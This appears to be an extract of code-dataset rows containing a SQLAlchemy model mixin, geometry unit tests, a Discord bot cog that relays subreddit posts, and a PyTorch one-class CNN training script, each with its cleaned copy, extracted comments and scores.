obj.pop('created', None)
obj.pop('modified', None)
column_names = tuple(column.name for column in cls.__table__.columns)
# Update all values from the dict that exist as a column or a
# relationship.
for key, value in obj.items():
if key in column_names:
columntype = str(cls.__table__.columns[key].type)
if columntype == 'DATE' and value is not None:
if isinstance(value, str):
value = dateutil.parser.parse(value)
elif columntype == 'TIME' and value is not None:
if isinstance(value, str):
value = dateutil.parser.parse(value).time()
setattr(entry, key, value)
elif key in relationships:
setattr(entry, key, relationships[key].by_ids(value))
return entry
# For future proofing use new_dict when creating new entries, so it could
# become a separate function if needed.
new_dict = merge_dict
@classmethod
def by_id(cls, _id):
"""Get entry by id."""
return cls.query.filter_by(id=_id).first()
@classmethod
def by_ids(cls, ids):
"""Get entries by id list."""
try:
return db.session.query(cls).filter(cls.id.in_(ids)).all()
except:
return []
| """base_model.py - Some things done to spare time.
Extra functionality that is used by all models. It extends db.Model with extra
functions.
"""
from app import db
from app.utils import serialize_sqla
from datetime import datetime
import dateutil.parser
class BaseEntity(object):
__table_args__ = {'sqlite_autoincrement': True}
# Only json items if explicitly defined, and just print id when not
# defined.
jsons = None
json_relationships = None
prints = ('id',)
# Columns that every model needs.
id = db.Column(db.Integer, primary_key=True)
created = db.Column(db.DateTime, default=datetime.now)
modified = db.Column(db.DateTime, default=datetime.now,
onupdate=datetime.now)
def __repr__(self):
"""Used by print to print a model at server side. It uses the prints
attribute from the object to determine what values to print."""
first = True
string = '<%s(' % (type(self).__name__)
for attr in self.prints:
string += (', ' if not first else '') + '"%s"' % (getattr(self,
attr))
first = False
string += ')>'
return string
# Function to
def to_dict(self):
"""Convert a sqlalchemy object instance to a dictionary.
This is needed for json serialization of an object. The jsons attribute
is used to determine what values to serialize (password hashes and such
should not in there).
"""
attrs = {}
set_jsons = False
if not self.jsons:
self.jsons = (column.name for column in self.__table__.columns)
set_jsons = True
for column in self.jsons:
value = serialize_sqla(getattr(self, column))
attrs[column] = value
if self.json_relationships:
for rel in self.json_relationships:
attrs[rel] = serialize_sqla(getattr(self, rel).all())
if set_jsons:
self.jsons = None
return attrs
@classmethod
def merge_dict(cls, obj, relationships={}):
"""Merge dictionary as object."""
# Get the correct entry from the database.
if 'id' in obj and obj['id']:
entry = cls.by_id(obj['id'])
if not entry:
return None
# If the dict doesn't contain id it means the entry does not exist yet.
else:
entry = cls()
# Remove id, created and modified, since those are things you want to
# automaticaly update.
obj.pop('id', None)
obj.pop('created', None)
obj.pop('modified', None)
column_names = tuple(column.name for column in cls.__table__.columns)
# Update all values from the dict that exist as a column or a
# relationship.
for key, value in obj.items():
if key in column_names:
columntype = str(cls.__table__.columns[key].type)
if columntype == 'DATE' and value is not None:
if isinstance(value, str):
value = dateutil.parser.parse(value)
elif columntype == 'TIME' and value is not None:
if isinstance(value, str):
value = dateutil.parser.parse(value).time()
setattr(entry, key, value)
elif key in relationships:
setattr(entry, key, relationships[key].by_ids(value))
return entry
# For future proofing use new_dict when creating new entries, so it could
# become a separate function if needed.
new_dict = merge_dict
@classmethod
def by_id(cls, _id):
"""Get entry by id."""
return cls.query.filter_by(id=_id).first()
@classmethod
def by_ids(cls, ids):
"""Get entries by id list."""
try:
return db.session.query(cls).filter(cls.id.in_(ids)).all()
except:
return [] | en | 0.88574 | base_model.py - Some things done to spare time. Extra functionality that is used by all models. It extends db.Model with extra functions. # Only json items if explicitly defined, and just print id when not # defined. # Columns that every model needs. Used by print to print a model at server side. It uses the prints attribute from the object to determine what values to print. # Function to Convert a sqlalchemy object instance to a dictionary. This is needed for json serialization of an object. The jsons attribute is used to determine what values to serialize (password hashes and such should not in there). Merge dictionary as object. # Get the correct entry from the database. # If the dict doesn't contain id it means the entry does not exist yet. # Remove id, created and modified, since those are things you want to # automaticaly update. # Update all values from the dict that exist as a column or a # relationship. # For future proofing use new_dict when creating new entries, so it could # become a separate function if needed. Get entry by id. Get entries by id list. | 3.327711 | 3 |
tests/test_lines.py | rsmith-nl/nctools | 3 | 6616717 | # file: test-lines.py
# vim:fileencoding=utf-8:ft=python
#
# Author: <NAME> <<EMAIL>>
# Created: 2016-03-28 12:45:47 +0200
# Last modified: 2018-01-23 22:02:50 +0100
"""Tests for the lines module."""
import sys
sys.path.insert(1, '.')
from nctools import lines # noqa
def test_mksegments_line():
entities = [
(
(0, 'LINE'), (5, '359'), (330, '475'), (100, 'AcDbEntity'), (8, 'deel 1'),
(100, 'AcDbLine'), (10, '999.9999999999984'), (20, '100.0'), (30, '0.0'),
(11, '1100.0'), (21, '100.0'), (31, '0.0')
), (
(0, 'LINE'), (5, '35A'), (330, '475'), (100, 'AcDbEntity'), (8, 'deel 1'),
(100, 'AcDbLine'), (10, '1100.0'), (20, '100.0'), (30, '0.0'), (11, '1100.0'),
(21, '600.0'), (31, '0.0')
), (
(0, 'LINE'), (5, '35B'), (330, '475'), (100, 'AcDbEntity'), (8, 'deel 1'),
(100, 'AcDbLine'), (10, '1100.0'), (20, '600.0'), (30, '0.0'), (11, '1000.0000001'),
(21, '600.0'), (31, '0.0')
)
]
segments = lines.mksegments(entities)
assert segments == [
[(1000, 100), (1100, 100)], [(1100, 100), (1100, 600)], [(1100, 600), (1000, 600)]
]
def test_mksegments_arc():
arc = [
(
(0, 'ARC'), (5, '35F'), (330, '475'), (100, 'AcDbEntity'), (8, 'deel 1'),
(100, 'AcDbCircle'), (10, '900.0'), (20, '349.9999999999998'), (30, '0.0'),
(40, '800.0'), (100, 'AcDbArc'), (50, '169.1930771251396'), (51, '190.8069228748603')
)
]
rv = lines.mksegments(arc)
ev = [
[
(114.188, 500.0), (106.316, 450.331), (101.581, 400.265), (100.0, 350.0),
(101.581, 299.735), (106.316, 249.669), (114.188, 200.0)
]
]
assert rv[0] == ev[0]
def test_combine_segments():
segments = [
[(0, 0), (100, 0)], [(0, 50), (50, 0)], [(100, 0), (100, 100)], [(100, 100), (0, 100)],
[(0, 100), (0, 0)]
]
rv = lines.combine_segments(segments)
ev = ([[(0, 0), (100, 0), (100, 100), (0, 100), (0, 0)]], [[(0, 50), (50, 0)]])
assert rv[0][0] == ev[0][0]
assert rv[1][0] == ev[1][0]
def test_closed():
segment = [(0, 0), (100, 0), (100, 100), (0, 100), (0, 0)]
assert lines.closed(segment) is True
def test_length():
openseg = [(0, 0), (100, 0), (100, 100)]
closedseg = [(0, 0), (100, 0), (100, 100), (0, 100), (0, 0)]
assert lines.length(openseg) == 200
assert lines.length(closedseg) == 400
def test_setstart():
closedseg = [(0, 0), (100, 0), (100, 100), (0, 100), (0, 0)]
lines.setstart(closedseg, (100, 100))
ev = [(100, 100), (0, 100), (0, 0), (100, 0), (100, 100)]
assert closedseg == ev
| # file: test-lines.py
# vim:fileencoding=utf-8:ft=python
#
# Author: <NAME> <<EMAIL>>
# Created: 2016-03-28 12:45:47 +0200
# Last modified: 2018-01-23 22:02:50 +0100
"""Tests for the lines module."""
import sys
sys.path.insert(1, '.')
from nctools import lines # noqa
def test_mksegments_line():
entities = [
(
(0, 'LINE'), (5, '359'), (330, '475'), (100, 'AcDbEntity'), (8, 'deel 1'),
(100, 'AcDbLine'), (10, '999.9999999999984'), (20, '100.0'), (30, '0.0'),
(11, '1100.0'), (21, '100.0'), (31, '0.0')
), (
(0, 'LINE'), (5, '35A'), (330, '475'), (100, 'AcDbEntity'), (8, 'deel 1'),
(100, 'AcDbLine'), (10, '1100.0'), (20, '100.0'), (30, '0.0'), (11, '1100.0'),
(21, '600.0'), (31, '0.0')
), (
(0, 'LINE'), (5, '35B'), (330, '475'), (100, 'AcDbEntity'), (8, 'deel 1'),
(100, 'AcDbLine'), (10, '1100.0'), (20, '600.0'), (30, '0.0'), (11, '1000.0000001'),
(21, '600.0'), (31, '0.0')
)
]
segments = lines.mksegments(entities)
assert segments == [
[(1000, 100), (1100, 100)], [(1100, 100), (1100, 600)], [(1100, 600), (1000, 600)]
]
def test_mksegments_arc():
arc = [
(
(0, 'ARC'), (5, '35F'), (330, '475'), (100, 'AcDbEntity'), (8, 'deel 1'),
(100, 'AcDbCircle'), (10, '900.0'), (20, '349.9999999999998'), (30, '0.0'),
(40, '800.0'), (100, 'AcDbArc'), (50, '169.1930771251396'), (51, '190.8069228748603')
)
]
rv = lines.mksegments(arc)
ev = [
[
(114.188, 500.0), (106.316, 450.331), (101.581, 400.265), (100.0, 350.0),
(101.581, 299.735), (106.316, 249.669), (114.188, 200.0)
]
]
assert rv[0] == ev[0]
def test_combine_segments():
segments = [
[(0, 0), (100, 0)], [(0, 50), (50, 0)], [(100, 0), (100, 100)], [(100, 100), (0, 100)],
[(0, 100), (0, 0)]
]
rv = lines.combine_segments(segments)
ev = ([[(0, 0), (100, 0), (100, 100), (0, 100), (0, 0)]], [[(0, 50), (50, 0)]])
assert rv[0][0] == ev[0][0]
assert rv[1][0] == ev[1][0]
def test_closed():
segment = [(0, 0), (100, 0), (100, 100), (0, 100), (0, 0)]
assert lines.closed(segment) is True
def test_length():
openseg = [(0, 0), (100, 0), (100, 100)]
closedseg = [(0, 0), (100, 0), (100, 100), (0, 100), (0, 0)]
assert lines.length(openseg) == 200
assert lines.length(closedseg) == 400
def test_setstart():
closedseg = [(0, 0), (100, 0), (100, 100), (0, 100), (0, 0)]
lines.setstart(closedseg, (100, 100))
ev = [(100, 100), (0, 100), (0, 0), (100, 0), (100, 100)]
assert closedseg == ev
| en | 0.496929 | # file: test-lines.py # vim:fileencoding=utf-8:ft=python # # Author: <NAME> <<EMAIL>> # Created: 2016-03-28 12:45:47 +0200 # Last modified: 2018-01-23 22:02:50 +0100 Tests for the lines module. # noqa | 2.276261 | 2 |
modules/reddit_feed/cog.py | DenverCoder1/professor-vector-discord-bot | 1 | 6616718 | <reponame>DenverCoder1/professor-vector-discord-bot
import datetime
import time
from discord.ext.tasks import loop
from discord.ext import commands
import asyncpraw
from asyncprawcore.exceptions import AsyncPrawcoreException
import asyncpraw.exceptions
from modules.reddit_feed.reddit_post import RedditPost
import config
# Reddit feed settings
CHECK_INTERVAL = 5 # seconds to wait before checking again
SUBMISSION_LIMIT = 5 # number of submissions to check
# initialize AsyncPraw reddit api
reddit = asyncpraw.Reddit(
client_id=config.CLIENT_ID,
client_secret=config.CLIENT_SECRET,
password=<PASSWORD>,
user_agent=f"{config.ME} Bot",
username=config.ME,
)
class RedditFeedCog(commands.Cog, name="Reddit Feed"):
"""Checks for `resend` command and starts Reddit feed loop to check submissions"""
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
"""When discord is connected"""
# Start Reddit loop
self.reddit_feed.start()
def is_in_guild(guild_id):
"""check that command is in a guild"""
async def predicate(ctx):
return ctx.guild and ctx.guild.id == guild_id
return commands.check(predicate)
@commands.command(name="resend")
@commands.has_permissions(administrator=True)
@is_in_guild(config.GUILD_ID)
async def resend(self, ctx):
"""Command to resend the last post again.
Invoked with !resend"""
# log command in console
print("Received resend command")
# respond to command
await ctx.send("Resending last announcement!")
# check for last submission in subreddit
subreddit = await reddit.subreddit(config.SUB)
async for submission in subreddit.new(limit=1):
# process submission
await RedditPost(self.bot, submission).process_post()
@loop(seconds=CHECK_INTERVAL)
async def reddit_feed(self):
"""loop every few seconds to check for new submissions"""
try:
# check for new submission in subreddit
subreddit = await reddit.subreddit(config.SUB)
async for submission in subreddit.new(limit=SUBMISSION_LIMIT):
# check if the post has been seen before
if not submission.saved:
# save post to mark as seen
await submission.save()
# process submission
await RedditPost(self.bot, submission).process_post()
except AsyncPrawcoreException as err:
print(f"EXCEPTION: AsyncPrawcoreException. {err}")
time.sleep(10)
@reddit_feed.before_loop
async def reddit_feed_init(self):
"""print startup info before reddit feed loop begins"""
print(f"Logged in: {str(datetime.datetime.now())[:-7]}")
print(f"Timezone: {time.tzname[time.localtime().tm_isdst]}")
print(f"Subreddit: {config.SUB}")
print(f"Checking {SUBMISSION_LIMIT} posts every {CHECK_INTERVAL} seconds")
def setup(bot):
bot.add_cog(RedditFeedCog(bot))
| import datetime
import time
from discord.ext.tasks import loop
from discord.ext import commands
import asyncpraw
from asyncprawcore.exceptions import AsyncPrawcoreException
import asyncpraw.exceptions
from modules.reddit_feed.reddit_post import RedditPost
import config
# Reddit feed settings
CHECK_INTERVAL = 5 # seconds to wait before checking again
SUBMISSION_LIMIT = 5 # number of submissions to check
# initialize AsyncPraw reddit api
reddit = asyncpraw.Reddit(
client_id=config.CLIENT_ID,
client_secret=config.CLIENT_SECRET,
password=<PASSWORD>,
user_agent=f"{config.ME} Bot",
username=config.ME,
)
class RedditFeedCog(commands.Cog, name="Reddit Feed"):
"""Checks for `resend` command and starts Reddit feed loop to check submissions"""
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
"""When discord is connected"""
# Start Reddit loop
self.reddit_feed.start()
def is_in_guild(guild_id):
"""check that command is in a guild"""
async def predicate(ctx):
return ctx.guild and ctx.guild.id == guild_id
return commands.check(predicate)
@commands.command(name="resend")
@commands.has_permissions(administrator=True)
@is_in_guild(config.GUILD_ID)
async def resend(self, ctx):
"""Command to resend the last post again.
Invoked with !resend"""
# log command in console
print("Received resend command")
# respond to command
await ctx.send("Resending last announcement!")
# check for last submission in subreddit
subreddit = await reddit.subreddit(config.SUB)
async for submission in subreddit.new(limit=1):
# process submission
await RedditPost(self.bot, submission).process_post()
@loop(seconds=CHECK_INTERVAL)
async def reddit_feed(self):
"""loop every few seconds to check for new submissions"""
try:
# check for new submission in subreddit
subreddit = await reddit.subreddit(config.SUB)
async for submission in subreddit.new(limit=SUBMISSION_LIMIT):
# check if the post has been seen before
if not submission.saved:
# save post to mark as seen
await submission.save()
# process submission
await RedditPost(self.bot, submission).process_post()
except AsyncPrawcoreException as err:
print(f"EXCEPTION: AsyncPrawcoreException. {err}")
time.sleep(10)
@reddit_feed.before_loop
async def reddit_feed_init(self):
"""print startup info before reddit feed loop begins"""
print(f"Logged in: {str(datetime.datetime.now())[:-7]}")
print(f"Timezone: {time.tzname[time.localtime().tm_isdst]}")
print(f"Subreddit: {config.SUB}")
print(f"Checking {SUBMISSION_LIMIT} posts every {CHECK_INTERVAL} seconds")
def setup(bot):
bot.add_cog(RedditFeedCog(bot)) | en | 0.907682 | # Reddit feed settings # seconds to wait before checking again # number of submissions to check # initialize AsyncPraw reddit api Checks for `resend` command and starts Reddit feed loop to check submissions When discord is connected # Start Reddit loop check that command is in a guild Command to resend the last post again. Invoked with !resend # log command in console # respond to command # check for last submission in subreddit # process submission loop every few seconds to check for new submissions # check for new submission in subreddit # check if the post has been seen before # save post to mark as seen # process submission print startup info before reddit feed loop begins | 3.000928 | 3 |
Working/oc-cnn-master-Q/src/main/train_Q.py | QUANHAO-NCU/pytorch-visual-block | 1 | 6616719 | import torch
import torchvision
import torch
import torch.nn as nn
import torch.nn.functional as func
import torchvision.models as models
import torchvision.transforms as transforms
import pickle as cp
import matplotlib.pyplot as plt
from subprocess import call
import visdom
from Config import *
from classifier import *
import cv2
import scipy.io
from scipy import misc
from sklearn import svm
from sklearn import metrics
import joblib
from sklearn.metrics import accuracy_score
import sys
import copy
import h5py
import time
import pickle
import os
import random
import argparse
import numpy as np
from light_cnn import *
from oneClassDataset import OneClassDataset
from classifier import classifier_nn
import torch.optim as optim
import torchvision
from torch.utils.data import DataLoader
from tqdm import tqdm
from Config import *
import VGG_FACE_torch
def getExtractor(model_type, pre_trained_flag):
if model_type == 'alexnet':
model = torchvision.models.alexnet(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-2])
model.classifier = new_classifier
elif model_type == 'vgg16':
model = torchvision.models.vgg16(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-3])
model.classifier = new_classifier
elif model_type == 'vgg19':
model = torchvision.models.vgg19(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-3])
model.classifier = new_classifier
elif model_type == 'vgg16bn':
model = torchvision.models.vgg16_bn(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-3])
model.classifier = new_classifier
elif model_type == 'vgg19bn':
model = torchvision.models.vgg19_bn(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-3])
model.classifier = new_classifier
elif model_type == 'resnet18':
model = torchvision.models.resnet18(pretrained=pre_trained_flag)
model.fc = nn.Sequential()
elif model_type == 'resnet34':
model = torchvision.models.resnet34(pretrained=pre_trained_flag)
model.fc = nn.Sequential()
elif model_type == 'resnet50':
model = torchvision.models.resnet50(pretrained=pre_trained_flag)
model.fc = nn.Sequential()
elif model_type == 'vggface':
model = VGG_FACE_torch.VGG_FACE_torch
model.load_state_dict(torch.load('VGG_FACE.pth'))
model = model[:-3]
elif model_type == 'lightcnn':
model = LightCNN_29Layers_v2(num_classes=80013)
model = torch.nn.DataParallel(model)
model.load_state_dict(torch.load('LightCNN_29Layers_V2_checkpoint.pth')['state_dict'])
new_model = nn.Sequential(*list(model.module.children())[:-1])
else:
raise argparse.ArgumentTypeError(
'models supported in this version of code are alexnet, vgg16, vgg19, vgg16bn, vgg19bn. \n '
'Enter model_type as one fo this argument')
return model
def addGaussianNoise(FeatureVectors, input_label, mean=0, std=0.01, shuffle=True):
# 一个正常输入对应一个噪声
noiseLabel = torch.zeros(len(FeatureVectors))
gaussian_data = np.random.normal(mean, std, FeatureVectors.shape)
gaussian_data = torch.from_numpy(gaussian_data)
data = torch.cat((FeatureVectors, gaussian_data), dim=0)
labels = torch.cat((input_label, noiseLabel))
# 原论文没有的操作
# 将输入和噪声打乱
if shuffle:
tmp = []
for index, tensor in enumerate(data):
tmp.append([tensor, labels[index]])
random.shuffle(tmp)
data = [torch.unsqueeze(i[0], dim=0) for i in tmp]
labels = [i[1] for i in tmp]
data = torch.cat(data, dim=0)
return data, labels
def getClassifier(featureDimension):
return classifier_nn(featureDimension)
def OCCNN_train(params):
datasetPath = params.datasetPath
positiveClass = params.positiveClass
extractor = params.extractor
extractor_pretrain = params.extractor_pretrain
batch_size = params.batch_size
num_workers = params.num_workers
featureDimension = params.D
lr = params.lr
epochs = params.epochs
gpu = params.gpu_flag
#####################################################################
train_loader = DataLoader(
OneClassDataset(path=datasetPath, positiveClass=positiveClass, mode='train'),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
val_loader = DataLoader(
OneClassDataset(path=datasetPath, positiveClass=positiveClass, mode='val'),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
test_loader = DataLoader(
OneClassDataset(path=datasetPath, positiveClass=positiveClass, mode='test'),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
model = getExtractor(extractor, extractor_pretrain)
classifier = getClassifier(featureDimension)
InstanceNormal = nn.InstanceNorm1d(1, affine=False)
relu = nn.ReLU()
loss_function = nn.CrossEntropyLoss()
model_optimizer = optim.Adam(model.classifier.parameters(), lr=lr)
classifier_optimizer = optim.Adam(classifier.parameters(), lr=lr)
if gpu:
device = torch.device('cuda:0')
model = model.to(device)
classifier = classifier.to(device)
relu = relu.to(device)
loss_function = loss_function.to(device)
# 记录信息
iteration = []
train_loss_iter = []
val_acc_iter = []
best_weights = ''
best_acc = 0
global_step = 1
for epoch in range(epochs):
model.train()
count_loss = 0
with tqdm(total=len(train_loader),
desc=f'{extractor} Epoch:{epoch}/{epochs};Iteration :{len(train_loader)}',
postfix=dict, mininterval=0.5) as train_bar:
for step, (image, label) in enumerate(train_loader):
image, label = image.to(device), label.to(device)
# 给图像添加高斯噪声
# 提取特征向量,进行像素上的归一化
featureVectors = model(image)
featureVectors = featureVectors.view(batch_size, 1, featureDimension)
featureVectors = InstanceNormal(featureVectors)
featureVectors = featureVectors.view(batch_size, featureDimension)
# 特征向量添加高斯噪声
data, labels = addGaussianNoise(featureVectors, label, shuffle=False)
data = relu(data)
out = classifier(data)
# 梯度清零
model_optimizer.zero_grad()
classifier_optimizer.zero_grad()
# 计算loss
loss = loss_function(out, labels)
count_loss += loss.item()
# 反向传播
loss.backward()
# 更新参数
model_optimizer.step()
classifier_optimizer.step()
global_step += 1
train_bar.set_postfix(**{'loss': count_loss / (step + 1)})
train_bar.update(1)
# 验证集,使用评估模式,该模式下神经网络不会记录梯度
val_acc = evaluate(model, classifier, val_loader)
iteration.append(epoch + 1)
train_loss_iter.append(count_loss / (step + 1))
val_acc_iter.append(val_acc)
# 输出验证信息
print('val acc:%.4f' % val_acc)
# 保存网络状态
if val_acc > best_acc:
best_acc = val_acc
if os.path.exists(best_weights):
# 删除之前保存的权值文件
os.remove(best_weights)
torch.save(model.state_dict(),
f'{extractor}-Epoch_{epoch + 1}-loss{round(count_loss / step + 1, 4)}-val acc_{round(val_acc, 4)}.pth')
best_weights = f'{extractor}-Epoch_{epoch + 1}-loss{round(count_loss / step + 1, 4)}-val acc_{round(val_acc, 4)}.pth'
print(f'save Epoch_{epoch + 1}-loss{round(count_loss / step + 1, 4)}-val acc_{round(val_acc, 4)}.pth')
def evaluate(extractor, classifier, val_loader):
extractor.eval()
classifier.eval()
device = torch.device('cuda:0')
count_loss = 0
relu = nn.ReLU()
correct = 0
total = len(val_loader)
with tqdm(total=len(val_loader),
desc=f';Iteration :{len(val_loader)}',
postfix=dict, mininterval=0.5) as train_bar:
for step, (image, label) in enumerate(val_loader):
image, label = image.to(device), label.to(device)
# 测试不用加噪声
featureVectors = extractor(image)
# data, labels = addGaussianNoise(featureVectors, label, shuffle=False)
data = relu(featureVectors)
out = classifier(data)
# 计算loss
predict = out.argmax(dim=1)
correct += torch.eq(predict, label).float().sum().item()
train_bar.set_postfix(**{'loss': count_loss / (step + 1)})
train_bar.update(1)
return correct / (total * val_loader.batch_size)
if __name__ == '__main__':
image = torch.randn((32, 3, 28, 28))
# image_val_ex = torch.randn((1, 3, 224, 224))
# modelvgg16 = getExtractor('vgg16', True)
# modelvgg19 = getExtractor('vgg19', True)
# modelAlex = getExtractor('alexnet', True)
#
# modelResNet = getExtractor('resnet18', True)
# out1 = modelResNet(image)
# modelResNet = torchvision.models.resnet34(True)
# modelResNet = torchvision.models.resnet50(True)
OCCNN_train(trainArgs())
out = image.view(32, 20)
print(out.shape)
| import torch
import torchvision
import torch
import torch.nn as nn
import torch.nn.functional as func
import torchvision.models as models
import torchvision.transforms as transforms
import pickle as cp
import matplotlib.pyplot as plt
from subprocess import call
import visdom
from Config import *
from classifier import *
import cv2
import scipy.io
from scipy import misc
from sklearn import svm
from sklearn import metrics
import joblib
from sklearn.metrics import accuracy_score
import sys
import copy
import h5py
import time
import pickle
import os
import random
import argparse
import numpy as np
from light_cnn import *
from oneClassDataset import OneClassDataset
from classifier import classifier_nn
import torch.optim as optim
import torchvision
from torch.utils.data import DataLoader
from tqdm import tqdm
from Config import *
import VGG_FACE_torch
def getExtractor(model_type, pre_trained_flag):
if model_type == 'alexnet':
model = torchvision.models.alexnet(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-2])
model.classifier = new_classifier
elif model_type == 'vgg16':
model = torchvision.models.vgg16(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-3])
model.classifier = new_classifier
elif model_type == 'vgg19':
model = torchvision.models.vgg19(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-3])
model.classifier = new_classifier
elif model_type == 'vgg16bn':
model = torchvision.models.vgg16_bn(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-3])
model.classifier = new_classifier
elif model_type == 'vgg19bn':
model = torchvision.models.vgg19_bn(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-3])
model.classifier = new_classifier
elif model_type == 'resnet18':
model = torchvision.models.resnet18(pretrained=pre_trained_flag)
model.fc = nn.Sequential()
elif model_type == 'resnet34':
model = torchvision.models.resnet34(pretrained=pre_trained_flag)
model.fc = nn.Sequential()
elif model_type == 'resnet50':
model = torchvision.models.resnet50(pretrained=pre_trained_flag)
model.fc = nn.Sequential()
elif model_type == 'vggface':
model = VGG_FACE_torch.VGG_FACE_torch
model.load_state_dict(torch.load('VGG_FACE.pth'))
model = model[:-3]
elif model_type == 'lightcnn':
model = LightCNN_29Layers_v2(num_classes=80013)
model = torch.nn.DataParallel(model)
model.load_state_dict(torch.load('LightCNN_29Layers_V2_checkpoint.pth')['state_dict'])
new_model = nn.Sequential(*list(model.module.children())[:-1])
else:
raise argparse.ArgumentTypeError(
'models supported in this version of code are alexnet, vgg16, vgg19, vgg16bn, vgg19bn. \n '
'Enter model_type as one fo this argument')
return model
def addGaussianNoise(FeatureVectors, input_label, mean=0, std=0.01, shuffle=True):
# 一个正常输入对应一个噪声
noiseLabel = torch.zeros(len(FeatureVectors))
gaussian_data = np.random.normal(mean, std, FeatureVectors.shape)
gaussian_data = torch.from_numpy(gaussian_data)
data = torch.cat((FeatureVectors, gaussian_data), dim=0)
labels = torch.cat((input_label, noiseLabel))
# 原论文没有的操作
# 将输入和噪声打乱
if shuffle:
tmp = []
for index, tensor in enumerate(data):
tmp.append([tensor, labels[index]])
random.shuffle(tmp)
data = [torch.unsqueeze(i[0], dim=0) for i in tmp]
labels = [i[1] for i in tmp]
data = torch.cat(data, dim=0)
return data, labels
def getClassifier(featureDimension):
return classifier_nn(featureDimension)
def OCCNN_train(params):
datasetPath = params.datasetPath
positiveClass = params.positiveClass
extractor = params.extractor
extractor_pretrain = params.extractor_pretrain
batch_size = params.batch_size
num_workers = params.num_workers
featureDimension = params.D
lr = params.lr
epochs = params.epochs
gpu = params.gpu_flag
#####################################################################
train_loader = DataLoader(
OneClassDataset(path=datasetPath, positiveClass=positiveClass, mode='train'),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
val_loader = DataLoader(
OneClassDataset(path=datasetPath, positiveClass=positiveClass, mode='val'),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
test_loader = DataLoader(
OneClassDataset(path=datasetPath, positiveClass=positiveClass, mode='test'),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
model = getExtractor(extractor, extractor_pretrain)
classifier = getClassifier(featureDimension)
InstanceNormal = nn.InstanceNorm1d(1, affine=False)
relu = nn.ReLU()
loss_function = nn.CrossEntropyLoss()
model_optimizer = optim.Adam(model.classifier.parameters(), lr=lr)
classifier_optimizer = optim.Adam(classifier.parameters(), lr=lr)
if gpu:
device = torch.device('cuda:0')
model = model.to(device)
classifier = classifier.to(device)
relu = relu.to(device)
loss_function = loss_function.to(device)
# bookkeeping: track per-epoch training loss and validation accuracy
iteration = []
train_loss_iter = []
val_acc_iter = []
best_weights = ''
best_acc = 0
global_step = 1
for epoch in range(epochs):
model.train()
count_loss = 0
with tqdm(total=len(train_loader),
desc=f'{extractor} Epoch:{epoch}/{epochs};Iteration :{len(train_loader)}',
postfix=dict, mininterval=0.5) as train_bar:
for step, (image, label) in enumerate(train_loader):
image, label = image.to(device), label.to(device)
# extract feature vectors and normalize them element-wise (instance normalization)
# (Gaussian noise is added to the feature vectors a few lines below, not to the raw images)
featureVectors = model(image)
featureVectors = featureVectors.view(batch_size, 1, featureDimension)
featureVectors = InstanceNormal(featureVectors)
featureVectors = featureVectors.view(batch_size, featureDimension)
# append Gaussian-noise samples to the feature vectors
data, labels = addGaussianNoise(featureVectors, label, shuffle=False)
data = relu(data)
out = classifier(data)
# zero the gradients
model_optimizer.zero_grad()
classifier_optimizer.zero_grad()
# compute the loss
loss = loss_function(out, labels)
count_loss += loss.item()
# backpropagate
loss.backward()
# update the parameters
model_optimizer.step()
classifier_optimizer.step()
global_step += 1
train_bar.set_postfix(**{'loss': count_loss / (step + 1)})
train_bar.update(1)
# validation pass: run the networks in eval mode (no parameter updates or gradient tracking needed here)
val_acc = evaluate(model, classifier, val_loader)
iteration.append(epoch + 1)
train_loss_iter.append(count_loss / (step + 1))
val_acc_iter.append(val_acc)
# print validation metrics
print('val acc:%.4f' % val_acc)
# save the network state
if val_acc > best_acc:
best_acc = val_acc
if os.path.exists(best_weights):
# delete the previously saved weights file
os.remove(best_weights)
# use the mean epoch loss in the checkpoint name (fixes the count_loss / step + 1 precedence bug)
torch.save(model.state_dict(),
f'{extractor}-Epoch_{epoch + 1}-loss{round(count_loss / (step + 1), 4)}-val acc_{round(val_acc, 4)}.pth')
best_weights = f'{extractor}-Epoch_{epoch + 1}-loss{round(count_loss / (step + 1), 4)}-val acc_{round(val_acc, 4)}.pth'
print(f'save Epoch_{epoch + 1}-loss{round(count_loss / (step + 1), 4)}-val acc_{round(val_acc, 4)}.pth')
def evaluate(extractor, classifier, val_loader):
extractor.eval()
classifier.eval()
device = torch.device('cuda:0')
count_loss = 0
relu = nn.ReLU()
correct = 0
total = len(val_loader)
with tqdm(total=len(val_loader),
desc=f';Iteration :{len(val_loader)}',
postfix=dict, mininterval=0.5) as train_bar:
for step, (image, label) in enumerate(val_loader):
image, label = image.to(device), label.to(device)
# no Gaussian noise is added at evaluation time
featureVectors = extractor(image)
# data, labels = addGaussianNoise(featureVectors, label, shuffle=False)
data = relu(featureVectors)
out = classifier(data)
# compute predictions and count correct ones (no loss is actually computed here)
predict = out.argmax(dim=1)
correct += torch.eq(predict, label).float().sum().item()
train_bar.set_postfix(**{'loss': count_loss / (step + 1)})
train_bar.update(1)
return correct / (total * val_loader.batch_size)
if __name__ == '__main__':
image = torch.randn((32, 3, 28, 28))
# image_val_ex = torch.randn((1, 3, 224, 224))
# modelvgg16 = getExtractor('vgg16', True)
# modelvgg19 = getExtractor('vgg19', True)
# modelAlex = getExtractor('alexnet', True)
#
# modelResNet = getExtractor('resnet18', True)
# out1 = modelResNet(image)
# modelResNet = torchvision.models.resnet34(True)
# modelResNet = torchvision.models.resnet50(True)
OCCNN_train(trainArgs())
